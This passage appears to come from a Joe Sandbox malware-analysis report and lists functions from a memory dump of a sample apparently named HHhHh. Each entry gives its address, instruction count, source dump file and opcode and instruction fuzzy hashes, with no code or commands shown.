                                            • Instruction ID: 10fe47671d2e5765acccc93cb9de2f35ded9d31845cdeb75b00f9fbf4449ef50
                                            • Opcode Fuzzy Hash: c6a0b1ac2a3f7a4c3d6d8f087e6ffb203265ba49f53ea013dd714f1acf80a329
                                            • Instruction Fuzzy Hash: 0E118B32251641EFDB16EF19CD90F66BBB8FF54B88F200465E9059B6A1C235ED01CA90
                                            Function 01296259 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f00cba05547427fae8055f0944311730850ebc09c01ac198c5bf3913b112f0b5
                                            • Instruction ID: 9524fde497aed72e8b10175edbb5dbe1582781639f48dc5b24e2eb6abd733162
                                            • Opcode Fuzzy Hash: f00cba05547427fae8055f0944311730850ebc09c01ac198c5bf3913b112f0b5
                                            • Instruction Fuzzy Hash: 2B117C71951229ABEF25EB68CD42FE9B3B4BF14714F5041D5A318A61E0DB709E81CF84
                                            Function 012C6DA0 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                            • Instruction ID: c6655d7c26ea86e92479d0666780f4bc09fc0bd6c4d3c9ebcf9a585193d6282a
                                            • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                            • Instruction Fuzzy Hash: 26014C716241566BEF299B55C805FAF7F64DB40F50F05421EAF065B380D774D881C7E1
                                            Function 01316050 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a7a296970d0f5f8ad2040fde0a459a91c3d5d6157cb9b4726f5fca4ced34f7f
                                            • Instruction ID: 15d34a4c4cc8e1c9cad93499c23ea67738ee86ef9db9f896693094681891bc0c
                                            • Opcode Fuzzy Hash: 2a7a296970d0f5f8ad2040fde0a459a91c3d5d6157cb9b4726f5fca4ced34f7f
                                            • Instruction Fuzzy Hash: 051117B2900119ABCB15DB94CC84DEFBB7CEF48358F044166EA06A7211EA34AA55CBA0
                                            Function 0129208A Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction ID: ac6bfb5836c851dd974f2a00644a1aae236c16fe2cb66a2d2b40f79906f1672c
                                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                            • Instruction Fuzzy Hash: 14012832620202DBEF119E5DD884BA2B76BFFE4700F5540A5EE458F246EAB1CC81C390
                                            Function 01326500 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 121121e7fc7332a011ba55bd14ccdf667be7b4adefbaeb5a4194d161f53f720c
                                            • Instruction ID: eb4def2b49cdde121bc63c1564d1b4e1c3f750e53407163318d79028a9a3dbf9
                                            • Opcode Fuzzy Hash: 121121e7fc7332a011ba55bd14ccdf667be7b4adefbaeb5a4194d161f53f720c
                                            • Instruction Fuzzy Hash: 2B11E172600156DFC301DF18D800BA6BBB9FF5A308F188159ED488B315D732EC80CBA0
                                            Function 0131C810 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a56163ae9b4c1d51ca3d8a126f040a220bb1d772713302061fdf19413b83a185
                                            • Instruction ID: f73d7fdf12b2e6963b08ab0e29473e5ca8c788460defcfaae189e19cab544b6a
                                            • Opcode Fuzzy Hash: a56163ae9b4c1d51ca3d8a126f040a220bb1d772713302061fdf19413b83a185
                                            • Instruction Fuzzy Hash: 141118B1A102199BCB04DFA9D581AAEBBF8FF58350F10806AA905E7355D674EA018BA4
                                            Function 0128C020 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction ID: e71d3711315eae6e9fc1c6a1106a04fc5e66f9f2af925f4cfa44fcd32f04846f
                                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                            • Instruction Fuzzy Hash: F401B93212070A9FDB22A6AAD444AF777E9FFC5754F448419A6458B540DB70E402C760
                                            Function 012D20F0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 786574b8661d39c894c8c536992665b0bbda69fa09119714aa6501cc7231192d
                                            • Instruction ID: b8c8da4794125016930821a05a8deb53819d4a52d2d07e58244e4ceebe22ad9a
                                            • Opcode Fuzzy Hash: 786574b8661d39c894c8c536992665b0bbda69fa09119714aa6501cc7231192d
                                            • Instruction Fuzzy Hash: A9116D75A1024DEBDB05EFA4D851FAEBBB5EB44344F008059E90197290D635EE11CB90
                                            Function 012CE5CF Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10600f2bf25fc3e59f8205e888803cd79b9f93680cffe081f1b060f504bdc770
                                            • Instruction ID: e91759e8bab4f24a40fe7e8a96df99b6d8bbd8182ec2f4a9fec55431d382d19b
                                            • Opcode Fuzzy Hash: 10600f2bf25fc3e59f8205e888803cd79b9f93680cffe081f1b060f504bdc770
                                            • Instruction Fuzzy Hash: 0801D4B1220A05BFC211BB29CD80E63BBECFB547947000629F20983951DB24EC01C7A0
                                            Function 013269C0 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cfafac99a52e39d747e7ae4c13bc94bc6e9d6b6eb49e49080a251f7828adf72
                                            • Instruction ID: 3e627a70ea9b79be60d02078523739505fbf4dec6bbd0837dac3cf71d42bf771
                                            • Opcode Fuzzy Hash: 2cfafac99a52e39d747e7ae4c13bc94bc6e9d6b6eb49e49080a251f7828adf72
                                            • Instruction Fuzzy Hash: BC01D8B22246169BD320EF69C849966FBA8FF54664F114129ED5987180E7309911C7D1
                                            Function 0131C460 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17984bc15e505d9147c6fde30fccd40bd1ccc1db784c2fa7d3b48cd9a019d666
                                            • Instruction ID: e9b7da32f6c80353c7aa6d7299bd69d35f3dd09488be5cfab518361cd2766f34
                                            • Opcode Fuzzy Hash: 17984bc15e505d9147c6fde30fccd40bd1ccc1db784c2fa7d3b48cd9a019d666
                                            • Instruction Fuzzy Hash: 34116D75A4024DEBDB19EFA8C854EBEBBB9FB58354F004059FD01A7354DA34E911CB90
                                            Function 0131C97C Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b01acb770821df635a3ca4ca7f870e1a251ede92258ae4a3826e642ae77b5d45
                                            • Instruction ID: 90efd2e2fcf9158ee0123cabd4423195fb062435be759d5615160f7032610180
                                            • Opcode Fuzzy Hash: b01acb770821df635a3ca4ca7f870e1a251ede92258ae4a3826e642ae77b5d45
                                            • Instruction Fuzzy Hash: E81139B16183499FC704DF69D44195BBBE8FF98710F00851AB998D7395E630E910CB96
                                            Function 0131CA11 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98060d2b306c874017d3dc259df8caf16ff63592d92f85e399a0f42c89e0f247
                                            • Instruction ID: 5a7a7ec791490a5e38ec31118f011ef57bf4f59ebe2a796b2d1c92b2fa57cef4
                                            • Opcode Fuzzy Hash: 98060d2b306c874017d3dc259df8caf16ff63592d92f85e399a0f42c89e0f247
                                            • Instruction Fuzzy Hash: 681179B26183099FC300DF69C44195BBBE8FF99350F00851AB998D73A4E630E900CB96
                                            Function 01364A80 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction ID: d4138ff9fe1e1d81a2b33bf75aecb89faf6a9e07259887032d1e66573f39d925
                                            • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                            • Instruction Fuzzy Hash: B401D832610705EFE721DA5DD844F9AB7EEFFC5614F048419E6428B654DA70F850C794
                                            Function 012AE016 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction ID: c4e34f79f776547432608841052fd5bf13bc47385b9eeb419b000b4f444149b8
                                            • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                            • Instruction Fuzzy Hash: 4901DF32264581DFE726871CC908F26BBD8FF44744F4A00A2FA05DB691D678DC81C221
                                            Function 0128826B Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 015abbab57561cd51d701d0b64d7b7786caee65b7b15ab6c70ad0d3abebdc826
                                            • Instruction ID: c77e45a7974b46bce0e0789fa774df89ad251ddf60dd037bfc2f56a735629ef5
                                            • Opcode Fuzzy Hash: 015abbab57561cd51d701d0b64d7b7786caee65b7b15ab6c70ad0d3abebdc826
                                            • Instruction Fuzzy Hash: 4501843172164ADBDB14FB79DC059AE77A9FF40614B554029DA01A7688DE70DD01C690
                                            Function 01292582 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5fa3834468cab28c496fa09c7d350e3726a192d4e439dcdd05c7a5eeecca1ff
                                            • Instruction ID: 4bbe73ba5e745f80840aa7a6a3d6773f9c8619869f08a18cc1b6332403652371
                                            • Opcode Fuzzy Hash: b5fa3834468cab28c496fa09c7d350e3726a192d4e439dcdd05c7a5eeecca1ff
                                            • Instruction Fuzzy Hash: 62F0A432A51A11BBCB35DB5A9D40F57BEAAEF84B90F154029E60597640DA70ED01CBA0
                                            Function 012BC073 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction ID: a89e946dd874bb81bb15c30b6cf214e237026ab5bb6fbeff2752ab6534a51dd5
                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                            • Instruction Fuzzy Hash: 3CF0C2B2600611ABD324CF4DDC40E67FBEADBD1B80F048528A605C7220EA31DD04CB90
                                            Function 0128C310 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction ID: 61cceb8fc60a557837bca26ff272a8b3057f5cd80f446fc1147bebe49936f9f4
                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                            • Instruction Fuzzy Hash: E2F0F2731665239BD73277594840BB7B5958FE1B54F154035E305571C0CB708D1357F0
                                            Function 012CCA6F Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction ID: df898df34d7a73c5a888e74523d5450c7f64fb0be0ac9d80c297761141563ed0
                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction Fuzzy Hash: 9E014931614685EBD327CB5CC809F59BBD8FF41B54F0940A9FB089B691D674C810C250
                                            Function 013661E5 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b8580e1a8f3ead0682bbf394bf5492c7c64d4039d5eba30b18efcb38c4d014b
                                            • Instruction ID: b9c4dd98ac27ceeabca89ad4f9729df81a562a84041664fed74098b1583edef1
                                            • Opcode Fuzzy Hash: 7b8580e1a8f3ead0682bbf394bf5492c7c64d4039d5eba30b18efcb38c4d014b
                                            • Instruction Fuzzy Hash: 08018FB1A10249DBCB00DFA9D445AEEBBF8BF58314F14405AE500B7280D774EA01CB98
                                            Function 013163C0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: 6516c8322827491366da37c1ad23c8f8dfb869593c3e604fbd7616debbdb39b0
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 09F0F97221001DBFEF019F95DD81DAF7B7EEB59298B104125FA11A2160D671DD21ABA0
                                            Function 0131A4B0 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4193d9c78307a5a0d13da4da878282fdd73913dc9fc8621b473c0418e3248969
                                            • Instruction ID: c3264f62d96443ce4e4fad7415a1456d262093210445799d54e3f40b677863c8
                                            • Opcode Fuzzy Hash: 4193d9c78307a5a0d13da4da878282fdd73913dc9fc8621b473c0418e3248969
                                            • Instruction Fuzzy Hash: 27018536105249EBCF129F84D840EDE7F6AFB4C7A9F068102FE1966224C736D970EB81
                                            Function 0128C0F0 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc893ad5cef50266671fe7052111a8bac4aaef970251c175ccae629d0a2c3cf3
                                            • Instruction ID: ba5b77a8268b63ddc1957d37ffe61484ad65c576a78fbe973049e51e15355308
                                            • Opcode Fuzzy Hash: cc893ad5cef50266671fe7052111a8bac4aaef970251c175ccae629d0a2c3cf3
                                            • Instruction Fuzzy Hash: 67F02B712352429BF710A519AC41FB23299E7D0754F29806AEB058B2C1EB70DC5183B4
                                            Function 012C656A Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 998b81999045398d86de807e119841e73972f983910f51a8c36a6a7b12c2e8a9
                                            • Instruction ID: cd15a032f60c019043f3b4c62b9e8ff31fba7737b951882622d586bca3c48d41
                                            • Opcode Fuzzy Hash: 998b81999045398d86de807e119841e73972f983910f51a8c36a6a7b12c2e8a9
                                            • Instruction Fuzzy Hash: 1701A470260B82DBE3339B6CDD58B2977E8BF54F48F580294BB019BADAE768D501C214
                                            Function 0133437C Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: daf50cb618e90bff4cb50d7ef516a4349dd431d64fa3005efce1ce8a030950af
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: 08F02731381E1387EB36AB2E8420B3FBA95AFD0E64B05862C9601CB680DF30DC20C784
                                            Function 0131E872 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: 4fa0f26cf54c30fff33e108cc58b5d871d788e42c47d4769ba8a55790a58d877
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: BDF0B432B105219FD3268A4DCC80F12BBA9AFD5E60F590034AE049B668C361EC0187D0
                                            Function 0131C89D Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f297dff59125902eaa30538ec7b06c62b410d2be741012cd4b7d5c0fee8dcec
                                            • Instruction ID: 365974f01df0615224dae7116faf293f71ab9081e9f604e189cb12cd86d44800
                                            • Opcode Fuzzy Hash: 0f297dff59125902eaa30538ec7b06c62b410d2be741012cd4b7d5c0fee8dcec
                                            • Instruction Fuzzy Hash: 0EF0AF706157449FC314EF68C445A2ABBE4FF98714F40465ABC98DB394E634E900CB96
                                            Function 012C0854 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 34654f4bf4a4fb564dca43cf40bb9ad67e4dd23b32d91402964a7f0920f898c2
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: AEF02472660200EFE714DB26CC01F57B6EDEF98700F14C078A644C71A4FAB0DD00C658
                                            Function 01318D20 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b66595e28ce1604f96d685c646811f87ca21f311e11126d758918334a010ce9d
                                            • Instruction ID: b481b73d0c007421bfbd926f7e993108652188445f9b9f1735c5a636b5465a1f
                                            • Opcode Fuzzy Hash: b66595e28ce1604f96d685c646811f87ca21f311e11126d758918334a010ce9d
                                            • Instruction Fuzzy Hash: E8F0B4365103486BDB257B1CA844B6ABB6DFBD472CF890459F949272758B306D80C784
                                            Function 0131C912 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 772ae2913d24f1185ab5ec118cd1764bd3b441d2b4f9092939ba6a636a829ace
                                            • Instruction ID: 59860eb50d53d072ba2a56822b39eda7353b3d390a3f2b4296ca6e169124e88e
                                            • Opcode Fuzzy Hash: 772ae2913d24f1185ab5ec118cd1764bd3b441d2b4f9092939ba6a636a829ace
                                            • Instruction Fuzzy Hash: 09F06270A1124DDFCB04EFA9C515A6EB7B4FF18304F008066B955EB395DA78EA01CB94
                                            Function 012947FB Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00804a7b0ef66b61498b309b3f31b9ff7a0bd31bca32ed12e6c0c553b23702e9
                                            • Instruction ID: 459c1de2bed33ccfbb5cb684497bf5961b1435678d43c7632194581dfe8370ce
                                            • Opcode Fuzzy Hash: 00804a7b0ef66b61498b309b3f31b9ff7a0bd31bca32ed12e6c0c553b23702e9
                                            • Instruction Fuzzy Hash: 49F0B4319366D29FEF32EB5CCE44B217BD8BB00638F088D6AD6498F542D764D882C651
                                            Function 01350115 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc94dbad2c3fa01d004e4cd0811132c3d202326dfc6b9d522e88443a446c6346
                                            • Instruction ID: 76725f839ace03f4bdcce2e9b4960a2c89586b3768bbe6bfe19683b83fc7e341
                                            • Opcode Fuzzy Hash: dc94dbad2c3fa01d004e4cd0811132c3d202326dfc6b9d522e88443a446c6346
                                            • Instruction Fuzzy Hash: 73F05CBE4157C007CF766B3C74527D93F9CA752B1CF0A1085DCA15B205C5759A83C365
                                            Function 012CC5ED Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
